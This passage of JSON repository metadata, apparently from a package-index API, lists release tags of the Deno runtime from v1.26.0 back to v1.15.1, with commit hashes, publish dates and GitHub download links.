fests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codel